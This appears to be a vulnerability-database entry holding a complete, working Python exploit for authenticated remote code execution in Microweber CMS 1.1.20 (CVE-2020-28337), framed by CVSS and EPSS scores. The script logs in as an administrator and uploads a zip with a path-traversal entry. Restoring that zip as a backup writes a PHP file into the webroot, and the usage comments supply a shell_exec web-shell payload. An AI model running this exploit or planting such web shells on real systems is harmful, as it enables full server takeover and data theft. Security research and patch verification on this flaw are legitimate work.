7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
7 High
AI Score
Confidence
High
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.034 Low
EPSS
Percentile
91.3%
# Exploit Title: Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)
# Date: 2020-10-31
# Exploit Author: sl1nki
# Vendor Homepage: https://microweber.org/
# Software Link: https://github.com/microweber/microweber/tree/1.1.20
# Version: <=1.1.20
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-28337
#
# Example usage with default phpinfo() payload:
# ./microweber_rce.py \
# --hostname "http://microwebertest.com" \
# --username "admin" \
# --password "password123"
#
#
# Example usage with custom payload (shell_exec):
# ./microweber_rce.py \
# --hostname "http://microwebertest.com" \
# --username "admin" \
# --password "password123" \
# --payload '<?php if (isset($_REQUEST["fexec"])) {echo "<pre>" . shell_exec($_REQUEST["fexec"]) . "</pre>";} ?>'
#
# Notes:
# * SSL verification is disabled by default
# * If for some reason the --target-path "/userfiles/cache
#!/usr/bin/python3
#/" doesn't work, "/userfiles/modules/" is a good one too.
#
#
#
import argparse
import re
import requests
import sys
import zipfile
from io import BytesIO
# Disable insecure SSL warnings
requests.packages.urllib3.disable_warnings()
class Microweber():
def __init__(self, baseUrl, proxies=None):
self.baseUrl = baseUrl
self.proxies = proxies
self.cookies = None
self.loginUrl = "/api/user_login"
self.uploadUrl = "/plupload"
self.moveZipToBackupUrl = "/api/Microweber/Utils/Backup/move_uploaded_file_to_backup"
self.restoreBackupUrl = "/api/Microweber/Utils/Backup/restore"
self.targetPath = "/userfiles/cache/"
self.targetFilename = "payload.php"
self.zipPayloadName = "payload.zip"
def makePostRequest(self, url, data=None, files=None, headers=None):
return requests.post(self.baseUrl + url,
data=data,
files=files,
headers=headers,
cookies=self.cookies,
proxies=self.proxies,
verify=False
)
def makeGetRequest(self, url, params=None):
return requests.post(self.baseUrl + url,
params=params,
cookies=self.cookies,
proxies=self.proxies,
verify=False
)
def login(self, username, password):
res = self.makePostRequest(self.loginUrl, data={
"username": username,
"password": password
})
if res.status_code == 200 and 'success' in res.json() and res.json()['success'] == "You are logged in!":
print(f"[+] Successfully logged in as {username}")
self.cookies = res.cookies
else:
print(f"[-] Unable to login. Status Code: {res.status_code}")
sys.exit(-1)
def createZip(self, path=None, filename=None, payload=None):
# In-memory adaptation of ptoomey3's evilarc
# https://github.com/ptoomey3/evilarc
if payload == None:
payload = "<?php phpinfo(); ?>"
zd = BytesIO()
zf = zipfile.ZipFile(zd, "w")
# The custom Unzip class uses a path under the webroot for cached file extraction
# /storage/cache/backup_restore/<md5 hash>/
# so moving up 4 directories puts us at the webroot
zf.writestr(f"../../../..{path}{filename}", payload)
zf.close()
return zd
def uploadZip(self, zipData):
# Upload the zip data as a general file
res = self.makePostRequest(self.uploadUrl,
headers={"Referer": ""},
data={
"name": self.zipPayloadName,
"chunk": 0,
"chunks": 1
},
files={"file": (self.zipPayloadName, zipData.getvalue(), "application/zip")}
)
if res.status_code == 200:
print(f"[+] Successfully uploaded: {self.zipPayloadName}")
j = res.json()
print(f"[+] URL: {j['src']}")
print(f"[+] Resulting Filename: {j['name']}")
self.zipPayloadName = j['name']
else:
print(f"[-] Unable to upload: {self.zipPayloadName} (Status Code: {res.status_code})")
sys.exit(-1)
def getAbsoluteWebRoot(self):
# Determine the webroot using the debug output and the DefaultController.php path
res = self.makeGetRequest("", params={
"debug": "true"
})
if res.status_code != 200:
print(f"[-] Unable to collect debug information. Bad server response: {res.status_code}")
sys.exit(-1)
target = "src/Microweber/Controllers/DefaultController.php"
m = re.findall('([\/\w]+)\/src\/Microweber\/Controllers\/DefaultController\.php', res.text)
if len(m) == 1:
return m[0]
else:
print(f"[-] Unable to determine the webroot using {target}. Found {len(m)} matches")
def moveZipToBackup(self):
# Move the uploaded zip file into the backup directory
webRoot = self.getAbsoluteWebRoot()
hostname = self.baseUrl.split("//")[1]
src = f"{webRoot}/userfiles/media/{hostname}/{self.zipPayloadName}"
res = self.makeGetRequest(self.moveZipToBackupUrl, params={
"src": src
})
if res.status_code == 200 and 'success' in res.json() and res.json()['success'] == f"{self.zipPayloadName} was uploaded!":
print(f"[+] Successfully moved {self.zipPayloadName} to backup")
else:
print(f"[-] Unable to move zip to backup ({res.status_code})")
sys.exit(-1)
def restoreBackup(self, filename):
# With the zip file in the backup directory, 'restore' it, which will cause it to be extracted unsafely
res = self.makePostRequest(self.restoreBackupUrl, data={
"id": filename
})
if res.status_code == 200 and "Backup was restored!" in res.text:
print(f"[+] Successfully restored backup {filename}")
else:
print(f"[-] Unable to restore backup {filename}")
sys.exit(-1)
def exploit(self, payload=None):
zipData = m.createZip(self.targetPath, self.targetFilename, payload=payload)
m.uploadZip(zipData)
m.moveZipToBackup()
m.restoreBackup(self.zipPayloadName)
print(f"[+] Successfully uploaded payload to {self.targetFilename}!=")
print(f"[+] Visit: {self.baseUrl}{self.targetPath}{self.targetFilename}")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--hostname", required=True, dest="hostname", help="Microweber hostname with protocol (e.g. http://microwebertest.com)")
parser.add_argument("--http-proxy", required=False, dest="http_proxy", help="HTTP Proxy (e.g. http://127.0.0.1:8000)")
parser.add_argument("--username", "-u", required=True, dest="username", help="Username of administrative user")
parser.add_argument("--password", "-p", required=True, dest="password", help="Password of administrative user")
parser.add_argument("--payload", required=False, dest="payload", help="Payload contents. Should be a string of PHP code. (default is phpinfo() )")
# Uncommon args
parser.add_argument("--target-file", required=False, dest="target_file", help="Target filename of the payload (default: payload.php")
parser.add_argument("--target-path", required=False, dest="target_path", help="Target path relative to webroot for the payload (default: /userfiles/cache/")
parser.add_argument("--zip-name", required=False, dest="zip_name", help="File name of tmp backup zip")
args = parser.parse_args()
proxies = None
if args.http_proxy:
proxies = {
"http": args.http_proxy
}
m = Microweber(args.hostname, proxies=proxies)
if args.target_file:
m.targetFilename = args.target_file
if args.target_path:
m.targetPath = args.target_path
if args.zip_name:
m.zipPayloadName = args.zip_name
m.login(args.username, args.password)
m.exploit(args.payload)
7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
7 High
AI Score
Confidence
High
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.034 Low
EPSS
Percentile
91.3%